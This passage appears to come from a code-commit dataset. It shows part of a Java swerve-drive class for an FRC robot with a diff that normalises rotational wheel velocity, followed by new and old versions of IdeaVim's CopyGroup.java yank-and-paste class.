SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); swerveDriveRobot(xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to a fixed angle using gyro */ public void swerveDriveTeleopGyro() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); double robotAngle = SwerveMap.Control.GYRO.getAngle(); swerveDriveAbsolute(robotAngle, xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Class to store angle and flip together * @author emiller * */ public class AngleFlip { private double angle; private boolean flip; public AngleFlip() { setAngle(0); setFlip(false); } public AngleFlip(double angle) { this.setAngle(angle); setFlip(false); } public AngleFlip(double angle, boolean flip) { this.setAngle(angle); flip = false; } /** * @return the angle */ public double getAngle() { return angle; } /** * @param angle the angle to set */ public void setAngle(double angle) { this.angle = angle; } /** * @return the flip */ public boolean isFlip() { return flip; } /** * @param flip the flip to set */ public void setFlip(boolean flip) { this.flip = flip; } }; /** * Normalizes an angle in degrees to (-180, 180]. * @param theta Angle to normalize * @return Normalized angle */ public double normalizeAngle(double theta) { while (theta > 180) { theta -= 360; } while (theta < -180) { theta += 360; } return theta; } /** * Compute angle needed to turn and whether or not flip is needed * @param currentAngle * @param targetAngle * @return new angle with flip */ public AngleFlip computeTurnAngle(double currentAngle, double targetAngle) { AngleFlip turnAngle = new AngleFlip(targetAngle - currentAngle, false); if (Math.abs(turnAngle.getAngle()) > 90) { turnAngle.setAngle(normalizeAngle(turnAngle.getAngle() + 180)); turnAngle.setFlip(true); } return turnAngle; } /** * Compute change angle to get from current to target angle. * @param currentAngle Current angle * @param targetAngle New angle to change to * @return change angle */ public double computeChangeAngle(double currentAngle, double targetAngle) { return computeTurnAngle(currentAngle, targetAngle).getAngle(); } /** * Scale drive speed based on how far wheel needs to turn * @param turnAngle Angle wheel needs to turn (with flip value) * @return speed scale factor in range [0, 1] */ public double driveScale(AngleFlip turnAngle) { double scale = 0; if (Math.abs(turnAngle.getAngle()) < 45) { /* * Eric comment: I don't like the discontinuous nature of this scaling. * Possible improvements: * 1) Use cosine(2 * turnAngle) * 2) Scale any angle < 90. */ scale = Math.cos(Math.toRadians(turnAngle.getAngle())); } else { scale = 0; } if (turnAngle.isFlip()) { scale = -scale; } return scale; } private class Pod implements PIDOutput, PIDSource { private Encoder steeringEnc; private SpeedController drive; private SpeedController steer; private PIDController pid; public Pod(SpeedController driveController, SpeedController steeringController, int steeringEncA, int steeringEncB, int podNumber) { steeringEnc = new Encoder(steeringEncA, steeringEncB); steeringEnc.setDistancePerPulse(SwerveMap.Constants.STEERING_ENC_PULSES_PER_REVOLUTION); drive = driveController; steer = steeringController; pid = new PIDController(SwerveMap.Constants.STEERING_PID_P, SwerveMap.Constants.STEERING_PID_I, SwerveMap.Constants.STEERING_PID_D, this, this); SmartDashboard.putData("Steering Pod " + podNumber, pid); pid.setInputRange(-180, 180); pid.setContinuous(true); pid.enable(); } public void pidWrite(double output) { steer.set(output); } public double pidGet() { return steeringEnc.getDistance(); } public void setSteeringAngle(double angle) { pid.setSetpoint(angle); } public void setWheelSpeed(double speed) { drive.set(speed); } } public void initDefaultCommand() { } }
Normalize rotational velocity based on maximum wheel distance from center.
2015RecycleRush/src/org/usfirst/frc/team2339/Barracuda/SwerveDrive.java
Normalize rotational velocity based on maximum wheel distance from center.
<ide><path>015RecycleRush/src/org/usfirst/frc/team2339/Barracuda/SwerveDrive.java <ide> double rearDist = L/2 + xPivotOffset; <ide> double rightDist = W/2 - yPivotOffset; <ide> double leftDist = W/2 + yPivotOffset; <add> <add> // Find maximum wheel distance (radius) from center <add> // Maximum radius is used to normalize rotational velocity so that wheels farthest from center move the fastest. <add> double xMax = Math.max(rightDist, leftDist); <add> double yMax = Math.max(frontDist, rearDist); <add> double rMax = Math.hypot(xMax, yMax); <ide> <ide> double xDist = 0; <ide> double yDist = 0; <del> double rWheel = 0; <ide> double xWheel = 0; <ide> double yWheel = 0; <ide> <ide> xDist = rightDist; <ide> yDist = frontDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity + rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity - rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity + rotateVelocity * yDist / rMax; <add> yWheel = yVelocity - rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[frontRight] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide> <ide> xDist = leftDist; <ide> yDist = frontDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity + rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity + rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity + rotateVelocity * yDist / rMax; <add> yWheel = yVelocity + rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide> <ide> xDist = leftDist; <ide> yDist = rearDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity - rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity + rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity - rotateVelocity * yDist / rMax; <add> yWheel = yVelocity + rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide> <ide> xDist = rightDist; <ide> yDist = rearDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity - rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity - rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity - rotateVelocity * yDist / rMax; <add> yWheel = yVelocity - rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[rearRight] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide>
Java
mit
69ebcc17e956b73d90a4992f12c8c61ccefb25bb
0
JetBrains/ideavim,JetBrains/ideavim
/* * IdeaVim - Vim emulator for IDEs based on the IntelliJ platform * Copyright (C) 2003-2016 The IdeaVim authors * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.maddyhome.idea.vim.group; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.editor.Caret; import com.intellij.openapi.editor.CaretModel; import com.intellij.openapi.editor.Editor; import com.intellij.openapi.editor.LogicalPosition; import com.intellij.openapi.util.Pair; import com.intellij.openapi.util.text.StringUtil; import com.maddyhome.idea.vim.VimPlugin; import com.maddyhome.idea.vim.command.Argument; import com.maddyhome.idea.vim.command.Command; import com.maddyhome.idea.vim.command.CommandState; import com.maddyhome.idea.vim.command.SelectionType; import com.maddyhome.idea.vim.common.Register; import com.maddyhome.idea.vim.common.TextRange; import com.maddyhome.idea.vim.handler.CaretOrder; import com.maddyhome.idea.vim.helper.EditorHelper; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import java.util.*; /** * This group works with command associated with copying and pasting text */ public class CopyGroup { /** * Creates the group */ public CopyGroup() { } /** * This yanks the text moved over by the motion command argument. * * @param editor The editor to yank from * @param context The data context * @param count The number of times to yank * @param rawCount The actual count entered by the user * @param argument The motion command argument * @return true if able to yank the text, false if not */ public boolean yankMotion(@NotNull Editor editor, DataContext context, int count, int rawCount, @NotNull Argument argument) { final Command motion = argument.getMotion(); if (motion == null) return false; final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); final Map<Caret, Integer> startOffsets = new HashMap<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final TextRange motionRange = MotionGroup.getMotionRange(editor, caret, context, count, rawCount, argument, true); if (motionRange == null) continue; assert motionRange.size() == 1; ranges.add(new Pair<>(motionRange.getStartOffset(), motionRange.getEndOffset())); startOffsets.put(caret, motionRange.normalize().getStartOffset()); } final SelectionType type = SelectionType.fromCommandFlags(motion.getFlags()); final TextRange range = getTextRange(ranges, type); final SelectionType selectionType = type == SelectionType.CHARACTER_WISE && range.isMultiple() ? SelectionType.BLOCK_WISE : type; return yankRange(editor, range, selectionType, startOffsets); } /** * This yanks count lines of text * * @param editor The editor to yank from * @param count The number of lines to yank * @return true if able to yank the lines, false if not */ public boolean yankLine(@NotNull Editor editor, int count) { final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final int start = VimPlugin.getMotion().moveCaretToLineStart(editor, caret); final int end = Math.min(VimPlugin.getMotion().moveCaretToLineEndOffset(editor, caret, count - 1, true) + 1, EditorHelper.getFileSize(editor)); if (end == -1) continue; ranges.add(new Pair<>(start, end)); } final TextRange range = getTextRange(ranges, SelectionType.LINE_WISE); return yankRange(editor, range, SelectionType.LINE_WISE, null); } /** * This yanks a range of text * * @param editor The editor to yank from * @param range The range of text to yank * @param type The type of yank * @return true if able to yank the range, false if not */ public boolean yankRange(@NotNull Editor editor, @Nullable TextRange range, @NotNull SelectionType type, boolean moveCursor) { if (range != null) { boolean res = VimPlugin.getRegister().storeText(editor, range, type, false); if (moveCursor) { MotionGroup.moveCaret(editor, editor.getCaretModel().getPrimaryCaret(), range.normalize().getStartOffset()); } return res; } return false; } /** * Pastes text from the last register into the editor. * * @param editor The editor to paste into * @param context The data context * @param count The number of times to perform the paste * @return true if able to paste, false if not */ public boolean putText(@NotNull Editor editor, @NotNull DataContext context, int count, boolean indent, boolean cursorAfter, boolean beforeCursor) { final Register register = VimPlugin.getRegister().getLastRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final String text = register.getText(); for (Caret caret : EditorHelper.getOrderedCaretsList(editor, CaretOrder.DECREASING_OFFSET)) { final int startOffset = getStartOffset(editor, caret, type, beforeCursor); if (text == null) { VimPlugin.getMark().setMark(editor, MarkGroup.MARK_CHANGE_POS, startOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, startOffset)); continue; } putText(editor, caret, context, text, type, CommandState.SubMode.NONE, startOffset, count, indent, cursorAfter); } return true; } public boolean putVisualRange(@NotNull Editor editor, @NotNull DataContext context, @NotNull TextRange range, int count, boolean indent, boolean cursorAfter) { final Register register = VimPlugin.getRegister().getLastRegister(); VimPlugin.getRegister().resetRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final int start = range.getStartOffset(); final int end = range.getEndOffset(); final int endLine = editor.offsetToLogicalPosition(end).line; final CommandState.SubMode subMode = CommandState.getInstance(editor).getSubMode(); if (subMode == CommandState.SubMode.VISUAL_LINE) { range = new TextRange(range.getStartOffset(), Math.min(range.getEndOffset() + 1, EditorHelper.getFileSize(editor))); } final Caret caret = editor.getCaretModel().getPrimaryCaret(); VimPlugin.getChange().deleteRange(editor, caret, range, SelectionType.fromSubMode(subMode), false); caret.moveToOffset(start); int startOffset = start; if (type == SelectionType.LINE_WISE) { if (subMode == CommandState.SubMode.VISUAL_BLOCK) { startOffset = editor.getDocument().getLineEndOffset(endLine) + 1; } else if (subMode != CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); startOffset = start + 1; } } else if (type != SelectionType.CHARACTER_WISE) { if (subMode == CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); } } putText(editor, caret, context, StringUtil.notNullize(register.getText()), type, subMode, startOffset, count, indent && type == SelectionType.LINE_WISE, cursorAfter); return true; } /** * This performs the actual insert of the paste * * @param editor The editor to paste into * @param context The data context * @param startOffset The location within the file to paste the text * @param text The text to paste * @param type The type of paste * @param count The number of times to paste the text * @param indent True if pasted lines should be autoindented, false if not * @param cursorAfter If true move cursor to just after pasted text * @param mode The type of highlight prior to the put. * @param caret The caret to insert to */ public void putText(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent, boolean cursorAfter) { if (mode == CommandState.SubMode.VISUAL_LINE && editor.isOneLineMode()) return; if (indent && type != SelectionType.LINE_WISE && mode != CommandState.SubMode.VISUAL_LINE) indent = false; if (type == SelectionType.LINE_WISE && text.length() > 0 && text.charAt(text.length() - 1) != '\n') { text = text + '\n'; } final int endOffset = putTextInternal(editor, caret, context, text, type, mode, startOffset, count, indent); moveCaret(editor, caret, type, mode, startOffset, cursorAfter, endOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, endOffset)); } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent) { final int endOffset = type != SelectionType.BLOCK_WISE ? putTextInternal(editor, caret, text, startOffset, count) : putTextInternal(editor, caret, text, mode, startOffset, count); if (indent) return doIndent(editor, caret, context, startOffset, endOffset); return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, @NotNull CommandState.SubMode mode, int startOffset, int count) { final LogicalPosition startPosition = editor.offsetToLogicalPosition(startOffset); final int currentColumn = mode == CommandState.SubMode.VISUAL_LINE ? 0 : startPosition.column; int currentLine = startPosition.line; final int lineCount = StringUtil.getLineBreakCount(text) + 1; if (currentLine + lineCount >= EditorHelper.getLineCount(editor)) { final int limit = currentLine + lineCount - EditorHelper.getLineCount(editor); for (int i = 0; i < limit; i++) { MotionGroup.moveCaret(editor, caret, EditorHelper.getFileSize(editor, true)); VimPlugin.getChange().insertText(editor, caret, "\n"); } } final int maxLen = getMaxSegmentLength(text); final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int endOffset = startOffset; while (tokenizer.hasMoreTokens()) { String segment = tokenizer.nextToken(); String origSegment = segment; if (segment.length() < maxLen) { final int diff = maxLen - segment.length(); final StringBuilder sb = new StringBuilder(segment.length() + diff); sb.append(segment); for (int i = 0; i < diff; i++) sb.append(' '); segment = sb.toString(); if (currentColumn != 0 && currentColumn < EditorHelper.getLineLength(editor, currentLine)) { origSegment = segment; } } final String pad = EditorHelper.pad(editor, currentLine, currentColumn); final int insertOffset = editor.logicalPositionToOffset(new LogicalPosition(currentLine, currentColumn)); MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, origSegment); endOffset = insertOffset + origSegment.length(); for (int i = 1; i < count; i++) VimPlugin.getChange().insertText(editor, caret, segment); endOffset += segment.length() * count; if (mode == CommandState.SubMode.VISUAL_LINE) { MotionGroup.moveCaret(editor, caret, endOffset); VimPlugin.getChange().insertText(editor, caret, "\n"); ++endOffset; } else { if (pad.length() > 0) { MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, pad); endOffset += pad.length(); } } ++currentLine; } return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, int startOffset, int count) { MotionGroup.moveCaret(editor, caret, startOffset); for (int i = 0; i < count; i++) { //TODO: change to stringbuilder? VimPlugin.getChange().insertText(editor, caret, text); } return startOffset + text.length() * count; } private int getStartOffset(@NotNull Editor editor, @NotNull Caret caret, SelectionType type, boolean beforeCursor) { if (beforeCursor) { return type == SelectionType.LINE_WISE ? VimPlugin.getMotion().moveCaretToLineStart(editor, caret) : caret.getOffset(); } int startOffset; if (type == SelectionType.LINE_WISE) { startOffset = Math.min(editor.getDocument().getTextLength(), VimPlugin.getMotion().moveCaretToLineEnd(editor, caret) + 1); if (startOffset > 0 && startOffset == editor.getDocument().getTextLength() && editor.getDocument().getCharsSequence().charAt(startOffset - 1) != '\n') { editor.getDocument().insertString(startOffset, "\n"); startOffset++; } } else { startOffset = caret.getOffset(); if (!EditorHelper.isLineEmpty(editor, caret.getLogicalPosition().line, false)) { startOffset++; } } if (startOffset > 0 && startOffset > editor.getDocument().getTextLength()) return startOffset - 1; return startOffset; } private void moveCaret(@NotNull Editor editor, @NotNull Caret caret, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, boolean cursorAfter, int endOffset) { int cursorMode; if (type == SelectionType.BLOCK_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 5 : 1; } } else if (type == SelectionType.LINE_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 3; } else { cursorMode = cursorAfter ? 4 : 3; } } else /* Characterwise */ { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 5 : 2; } } switch (cursorMode) { case 1: MotionGroup.moveCaret(editor, caret, startOffset); break; case 2: MotionGroup.moveCaret(editor, caret, endOffset - 1); break; case 3: MotionGroup.moveCaret(editor, caret, startOffset); MotionGroup.moveCaret(editor, caret, VimPlugin.getMotion().moveCaretToLineStartSkipLeading(editor, caret)); break; case 4: MotionGroup.moveCaret(editor, caret, endOffset + 1); break; case 5: int pos = Math.min(endOffset, EditorHelper.getLineEndForOffset(editor, endOffset - 1) - 1); MotionGroup.moveCaret(editor, caret, pos); break; } } private int doIndent(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, int startOffset, int endOffset) { final int startLine = editor.offsetToLogicalPosition(startOffset).line; final int endLine = editor.offsetToLogicalPosition(endOffset - 1).line; final int startLineOffset = editor.getDocument().getLineStartOffset(startLine); final int endLineOffset = editor.getDocument().getLineEndOffset(endLine); VimPlugin.getChange().autoIndentRange(editor, caret, context, new TextRange(startLineOffset, endLineOffset)); return EditorHelper.getLineEndOffset(editor, endLine, true); } private int getMaxSegmentLength(@NotNull String text) { final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int maxLen = 0; while (tokenizer.hasMoreTokens()) { final String s = tokenizer.nextToken(); maxLen = Math.max(s.length(), maxLen); } return maxLen; } @NotNull private TextRange getTextRange(@NotNull List<Pair<Integer, Integer>> ranges, @NotNull SelectionType type) { final int size = ranges.size(); final int[] starts = new int[size]; final int[] ends = new int[size]; switch (type) { case LINE_WISE: starts[size - 1] = ranges.get(size - 1).first; ends[size - 1] = ranges.get(size - 1).second; for (int i = 0; i < size - 1; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second - 1; } break; case CHARACTER_WISE: for (int i = 0; i < size; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second; } break; case BLOCK_WISE: assert ranges.size() == 1; } return new TextRange(starts, ends); } private boolean yankRange(@NotNull Editor editor, @NotNull TextRange range, @NotNull SelectionType type, @Nullable Map<Caret, Integer> startOffsets) { if (startOffsets != null) startOffsets.forEach((caret, offset) -> MotionGroup.moveCaret(editor, caret, offset)); return VimPlugin.getRegister().storeText(editor, range, type, false); } }
src/com/maddyhome/idea/vim/group/CopyGroup.java
/* * IdeaVim - Vim emulator for IDEs based on the IntelliJ platform * Copyright (C) 2003-2016 The IdeaVim authors * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.maddyhome.idea.vim.group; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.editor.Caret; import com.intellij.openapi.editor.CaretModel; import com.intellij.openapi.editor.Editor; import com.intellij.openapi.editor.LogicalPosition; import com.intellij.openapi.util.Pair; import com.intellij.openapi.util.text.StringUtil; import com.maddyhome.idea.vim.VimPlugin; import com.maddyhome.idea.vim.command.Argument; import com.maddyhome.idea.vim.command.Command; import com.maddyhome.idea.vim.command.CommandState; import com.maddyhome.idea.vim.command.SelectionType; import com.maddyhome.idea.vim.common.Register; import com.maddyhome.idea.vim.common.TextRange; import com.maddyhome.idea.vim.handler.CaretOrder; import com.maddyhome.idea.vim.helper.EditorHelper; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import java.util.*; /** * This group works with command associated with copying and pasting text */ public class CopyGroup { /** * Creates the group */ public CopyGroup() { } /** * This yanks the text moved over by the motion command argument. * * @param editor The editor to yank from * @param context The data context * @param count The number of times to yank * @param rawCount The actual count entered by the user * @param argument The motion command argument * @return true if able to yank the text, false if not */ public boolean yankMotion(@NotNull Editor editor, DataContext context, int count, int rawCount, @NotNull Argument argument) { final Command motion = argument.getMotion(); if (motion == null) return false; final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); final Map<Caret, Integer> startOffsets = new HashMap<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final TextRange motionRange = MotionGroup.getMotionRange(editor, caret, context, count, rawCount, argument, true); if (motionRange == null) continue; assert motionRange.size() == 1; ranges.add(new Pair<>(motionRange.getStartOffset(), motionRange.getEndOffset())); startOffsets.put(caret, motionRange.normalize().getStartOffset()); } final SelectionType type = SelectionType.fromCommandFlags(motion.getFlags()); final TextRange range = getTextRange(ranges, type); final SelectionType selectionType = type == SelectionType.CHARACTER_WISE && range.isMultiple() ? SelectionType.BLOCK_WISE : type; return yankRange(editor, range, selectionType, startOffsets); } /** * This yanks count lines of text * * @param editor The editor to yank from * @param count The number of lines to yank * @return true if able to yank the lines, false if not */ public boolean yankLine(@NotNull Editor editor, int count) { final CaretModel caretModel = editor.getCaretModel(); final List<Pair<Integer, Integer>> ranges = new ArrayList<>(caretModel.getCaretCount()); for (Caret caret : caretModel.getAllCarets()) { final int start = VimPlugin.getMotion().moveCaretToLineStart(editor, caret); final int end = Math.min(VimPlugin.getMotion().moveCaretToLineEndOffset(editor, caret, count - 1, true) + 1, EditorHelper.getFileSize(editor)); if (end == -1) continue; ranges.add(new Pair<>(start, end)); } final TextRange range = getTextRange(ranges, SelectionType.LINE_WISE); return yankRange(editor, range, SelectionType.LINE_WISE, null); } /** * This yanks a range of text * * @param editor The editor to yank from * @param range The range of text to yank * @param type The type of yank * @return true if able to yank the range, false if not */ public boolean yankRange(@NotNull Editor editor, @Nullable TextRange range, @NotNull SelectionType type, boolean moveCursor) { if (range != null) { boolean res = VimPlugin.getRegister().storeText(editor, range, type, false); if (moveCursor) { MotionGroup.moveCaret(editor, editor.getCaretModel().getPrimaryCaret(), range.normalize().getStartOffset()); } return res; } return false; } /** * Pastes text from the last register into the editor. * * @param editor The editor to paste into * @param context The data context * @param count The number of times to perform the paste * @return true if able to paste, false if not */ public boolean putText(@NotNull Editor editor, @NotNull DataContext context, int count, boolean indent, boolean cursorAfter, boolean beforeCursor) { final Register register = VimPlugin.getRegister().getLastRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final String text = register.getText(); for (Caret caret : EditorHelper.getOrderedCaretsList(editor, CaretOrder.DECREASING_OFFSET)) { final int startOffset = getStartOffset(editor, caret, type, beforeCursor); if (text == null) { VimPlugin.getMark().setMark(editor, MarkGroup.MARK_CHANGE_POS, startOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, startOffset)); continue; } putText(editor, caret, context, text, type, CommandState.SubMode.NONE, startOffset, count, indent, cursorAfter); } return true; } public boolean putVisualRange(@NotNull Editor editor, @NotNull DataContext context, @NotNull TextRange range, int count, boolean indent, boolean cursorAfter) { final Register register = VimPlugin.getRegister().getLastRegister(); VimPlugin.getRegister().resetRegister(); if (register == null) return false; final SelectionType type = register.getType(); if (type == SelectionType.LINE_WISE && editor.isOneLineMode()) return false; final int start = range.getStartOffset(); final int end = range.getEndOffset(); final int endLine = editor.offsetToLogicalPosition(end).line; final CommandState.SubMode subMode = CommandState.getInstance(editor).getSubMode(); if (subMode == CommandState.SubMode.VISUAL_LINE) { range = new TextRange(range.getStartOffset(), Math.min(range.getEndOffset() + 1, EditorHelper.getFileSize(editor))); } final Caret caret = editor.getCaretModel().getPrimaryCaret(); VimPlugin.getChange().deleteRange(editor, caret, range, SelectionType.fromSubMode(subMode), false); caret.moveToOffset(start); int startOffset = start; if (type == SelectionType.LINE_WISE) { if (subMode == CommandState.SubMode.VISUAL_BLOCK) { startOffset = editor.getDocument().getLineEndOffset(endLine) + 1; } else if (subMode != CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); startOffset = start + 1; } } else if (type != SelectionType.CHARACTER_WISE) { if (subMode == CommandState.SubMode.VISUAL_LINE) { editor.getDocument().insertString(start, "\n"); } } putText(editor, caret, context, StringUtil.notNullize(register.getText()), type, subMode, startOffset, count, indent && type == SelectionType.LINE_WISE, cursorAfter); return true; } /** * This performs the actual insert of the paste * * @param editor The editor to paste into * @param context The data context * @param startOffset The location within the file to paste the text * @param text The text to paste * @param type The type of paste * @param count The number of times to paste the text * @param indent True if pasted lines should be autoindented, false if not * @param cursorAfter If true move cursor to just after pasted text * @param mode The type of highlight prior to the put. * @param caret The caret to insert to */ public void putText(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent, boolean cursorAfter) { if (mode == CommandState.SubMode.VISUAL_LINE && editor.isOneLineMode()) return; if (indent && type != SelectionType.LINE_WISE && mode != CommandState.SubMode.VISUAL_LINE) indent = false; if (type == SelectionType.LINE_WISE && text.length() > 0 && text.charAt(text.length() - 1) != '\n') { text = text + '\n'; } final int endOffset = putTextInternal(editor, caret, context, text, type, mode, startOffset, count, indent); moveCaret(editor, caret, type, mode, startOffset, cursorAfter, endOffset); VimPlugin.getMark().setChangeMarks(editor, new TextRange(startOffset, endOffset)); } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, @NotNull String text, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, int count, boolean indent) { final int endOffset = type != SelectionType.BLOCK_WISE ? putTextInternal(editor, caret, text, startOffset, count) : putTextInternal(editor, caret, text, mode, startOffset, count); if (indent) return doIndent(editor, caret, context, startOffset, endOffset); return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, @NotNull CommandState.SubMode mode, int startOffset, int count) { final LogicalPosition startPosition = editor.offsetToLogicalPosition(startOffset); final int currentColumn = mode == CommandState.SubMode.VISUAL_LINE ? 0 : startPosition.column; int currentLine = startPosition.line; final int lineCount = StringUtil.getLineBreakCount(text) + 1; if (currentLine + lineCount >= EditorHelper.getLineCount(editor)) { for (int i = 0; i < currentLine + lineCount - EditorHelper.getLineCount(editor); i++) { MotionGroup.moveCaret(editor, caret, EditorHelper.getFileSize(editor, true)); VimPlugin.getChange().insertText(editor, caret, "\n"); } } final int maxLen = getMaxSegmentLength(text); final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int endOffset = startOffset; while (tokenizer.hasMoreTokens()) { String segment = tokenizer.nextToken(); String origSegment = segment; if (segment.length() < maxLen) { final int diff = maxLen - segment.length(); final StringBuilder sb = new StringBuilder(segment.length() + diff); sb.append(segment); for (int i = 0; i < diff; i++) sb.append(' '); segment = sb.toString(); if (currentColumn != 0 && currentColumn < EditorHelper.getLineLength(editor, currentLine)) { origSegment = segment; } } final String pad = EditorHelper.pad(editor, currentLine, currentColumn); final int insertOffset = editor.logicalPositionToOffset(new LogicalPosition(currentLine, currentColumn)); MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, origSegment); endOffset = insertOffset + origSegment.length(); for (int i = 1; i < count; i++) VimPlugin.getChange().insertText(editor, caret, segment); endOffset += segment.length() * count; if (mode == CommandState.SubMode.VISUAL_LINE) { MotionGroup.moveCaret(editor, caret, endOffset); 